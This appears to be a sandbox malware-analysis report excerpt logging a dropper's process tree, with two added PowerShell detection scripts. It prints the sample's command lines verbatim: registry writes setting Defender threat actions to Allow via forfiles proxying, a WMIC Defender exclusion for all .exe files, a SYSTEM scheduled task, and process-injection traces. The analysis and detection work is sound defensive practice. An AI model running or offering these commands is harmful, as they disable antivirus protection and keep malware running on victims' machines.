Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56C000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58B000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 593000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D9000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C32008
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2435008
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 260000
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 261000
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AB000
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AE000
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2BD000
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 11_2_00478420
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
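The memory writes above begin at 0x400000 in RegAsm.exe, the usual image base of a 32-bit executable, and at 0x260000 in BitLockerToGo.exe, and each series follows a process creation whose command line is nothing but the host's own path, with a parent on the Desktop or under Documents: what a PE written over a freshly started host looks like in telemetry. The script below is an added example, not part of the report or of any of the samples; it looks for live instances of those two images that were launched with a bare command line or by a parent outside the Windows and Program Files trees. The image list and the trusted parent roots are assumptions to tune for the estate.

```powershell
# Added example, not part of the report or of the samples it describes.
# Flags running RegAsm.exe / BitLockerToGo.exe instances that look like the
# injection hosts recorded above. Image list and trusted roots are assumptions.
$hostImages   = @('RegAsm.exe', 'BitLockerToGo.exe')
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
                Where-Object { $_ -ne '\' }   # drop the empty x86 root on 32-bit hosts

function Get-SuspiciousInjectionHost {
    $all   = Get-CimInstance -ClassName Win32_Process
    $byPid = @{}
    foreach ($p in $all) { $byPid[[int]$p.ProcessId] = $p }

    foreach ($p in ($all | Where-Object { $hostImages -contains $_.Name })) {
        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentPath = if ($parent) { $parent.ExecutablePath } else { $null }
        $reasons    = @()

        # "C:\...\RegAsm.exe" with no arguments, exactly how the report records the host launch
        $barePattern = '^\s*"?[^"]*\\' + [regex]::Escape($p.Name) + '"?\s*$'
        if ($p.CommandLine -and $p.CommandLine -match $barePattern) {
            $reasons += 'launched with no arguments'
        }

        if (-not $parent) {
            # Win32_Process keeps the parent PID after the parent dies; the PID may also have been reused
            $reasons += 'parent no longer running'
        } elseif (-not ($trustedRoots | Where-Object {
                      $parentPath -and $parentPath.StartsWith($_, [System.StringComparison]::OrdinalIgnoreCase) })) {
            $reasons += "parent outside trusted roots: $parentPath"
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                ProcessId   = $p.ProcessId
                Image       = $p.Name
                Parent      = $parentPath
                CommandLine = $p.CommandLine
                Reasons     = $reasons -join '; '
            }
        }
    }
}

Get-SuspiciousInjectionHost | Format-List
```

A bare command line alone is weak evidence (RegAsm.exe is sometimes started that way by installers), so the parent check is the one that carries the weight: in this run the parents are file.exe on the Desktop and a dropped executable under Documents\iofolko5, neither of which a trusted root covers. When a hit is found, dump the process with its image base region, since the report shows the on-disk image being overwritten from 0x400000 onward.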
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
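The Install.exe lines above are one procedure, and its point is lineage. forfiles is given /p c:\windows\system32 and an /m mask naming a file that is always there (where.exe, calc.exe, waitfor.exe, help.exe), so the /c payload runs exactly once, and the payload is a fresh cmd.exe; only that grandchild starts reg.exe, PowerShell or WMIC, so the direct parent of every reg.exe is cmd.exe and its grandparent is forfiles.exe rather than the dropper. The reg.exe calls write four threat IDs under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction with data 6, Defender's action code for Allow, and gpupdate /force makes the policy take effect; the WMIC call adds a Defender exclusion for every .exe; schtasks registers Install.exe to run again as SYSTEM. The script below is an added example, not code from the report or from any of the samples: it matches those command lines against a constructed set of process-creation events (PIDs, field names and the shortened tree are assumptions), decodes the threat override, and prints each hit with its full ancestry.

```powershell
# Added example, not part of the Joe Sandbox report or of the samples it describes.
# Process-creation events constructed to mirror the report's lines. PIDs, field
# names and the shortened tree (WMIC shown directly under PowerShell) are assumptions.
$events = @(
    [pscustomobject]@{ ProcessId=100; ParentProcessId=1;   Image='C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe'; CommandLine='Install.exe' }
    [pscustomobject]@{ ProcessId=200; ParentProcessId=100; Image='C:\Windows\SysWOW64\cmd.exe';      CommandLine='"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"' }
    [pscustomobject]@{ ProcessId=300; ParentProcessId=200; Image='C:\Windows\SysWOW64\forfiles.exe'; CommandLine='forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"' }
    [pscustomobject]@{ ProcessId=400; ParentProcessId=300; Image='C:\Windows\SysWOW64\cmd.exe';      CommandLine='/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6' }
    [pscustomobject]@{ ProcessId=500; ParentProcessId=400; Image='C:\Windows\SysWOW64\reg.exe';      CommandLine='reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6' }
    [pscustomobject]@{ ProcessId=600; ParentProcessId=100; Image='C:\Windows\SysWOW64\schtasks.exe'; CommandLine='schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F' }
    [pscustomobject]@{ ProcessId=700; ParentProcessId=100; Image='C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine='powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True' }
    [pscustomobject]@{ ProcessId=800; ParentProcessId=1;   Image='C:\Windows\System32\reg.exe';      CommandLine='reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName' }   # benign control, must not fire
)

# One rule per step of the procedure; .NET regex, so \\ is a literal backslash
$rules = @(
    [pscustomobject]@{ Name='forfiles used to proxy cmd';             Pattern='(?i)\bforfiles(\.exe)?\b.*\s/c\s+"?cmd\b' }
    [pscustomobject]@{ Name='Defender threat override written';       Pattern='(?i)\breg(\.exe)?\s+add\b.*Windows Defender\\Threats\\ThreatIDDefaultAction' }
    [pscustomobject]@{ Name='Defender exclusion added through WMI';   Pattern='(?i)MSFT_MpPreference\b.*\bcall\s+Add\b.*\bExclusion' }
    [pscustomobject]@{ Name='SYSTEM task pointing into %TEMP%';       Pattern='(?i)\bschtasks(\.exe)?\s+/create\b.*\s/ru\s+"?system"?.*\s/tr\s+.*\\AppData\\Local\\Temp\\' }
    [pscustomobject]@{ Name='gpupdate forced from hidden PowerShell'; Pattern='(?i)\bpowershell\b.*\bgpupdate(\.exe)?\s+/force\b' }
)

# Defender action codes used by ThreatIDDefaultAction; the sample writes 6
$actionNames = @{ '1'='Clean'; '2'='Quarantine'; '3'='Remove'; '6'='Allow'; '8'='UserDefined'; '9'='NoAction'; '10'='Block' }

function Get-Lineage {
    param($Proc, [hashtable]$ByPid)
    $chain = @()
    $cur = $Proc
    while ($cur) {
        $chain = @(Split-Path -Leaf $cur.Image) + $chain
        $cur = $ByPid[[int]$cur.ParentProcessId]   # $null once the root is reached
    }
    $chain -join ' > '
}

function Find-DefenderTamper {
    param([Parameter(Mandatory)][object[]]$Events)
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }
    foreach ($e in $Events) {
        $hits = @($rules | Where-Object { $e.CommandLine -match $_.Pattern } | Select-Object -ExpandProperty Name)
        if ($hits.Count -eq 0) { continue }
        $override = $null
        if ($e.CommandLine -match '(?i)ThreatIDDefaultAction.*\s/v\s+(\d+)\b.*\s/d\s+(\d+)\b') {
            $meaning  = if ($actionNames.ContainsKey($Matches[2])) { $actionNames[$Matches[2]] } else { 'unknown' }
            $override = "threat $($Matches[1]) -> action $($Matches[2]) ($meaning)"
        }
        [pscustomobject]@{
            Lineage     = Get-Lineage -Proc $e -ByPid $byPid
            Rules       = $hits -join '; '
            Override    = $override
            CommandLine = $e.CommandLine
        }
    }
}

Find-DefenderTamper -Events $events | Format-Table -Wrap Lineage, Rules, Override
```

Matching on the terminal reg.exe and WMIC command lines catches the action however many proxies sit in front of it; the forfiles and schtasks rules exist to recover the dropper as the root of the chain, which the lineage column makes visible (Install.exe > cmd.exe > forfiles.exe > cmd.exe > reg.exe). With a real EDR feed, replace $events with the product's process events and keep the lineage walk. The control event (reg query) produces no row.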
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 11_2_0042E0AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0053EF8E cpuid 3_2_0053EF8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_005611F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_005613F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_005614EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_005614A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_00561586
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00561611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 3_2_0055B6A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoEx,FormatMessageA, 3_2_005407DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_00561864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_0056198D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_00561A93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 3_2_0055BB74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00561B69
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: GetLocaleInfoA, 7_2_004051FC
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: GetLocaleInfoA, 7_2_00405248
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_004210E8
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_0042120E
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 9_2_00420A82
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_00421314
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_0041931F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_004213E3
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420D6F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420D24
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_00420E0A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_00420E95
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_004197E4
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020D9A4B
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW, 9_2_020E134F
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E1071
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 9_2_020E10FC
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_020E164A
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: EnumSystemLocalesW, 9_2_020E0F8B
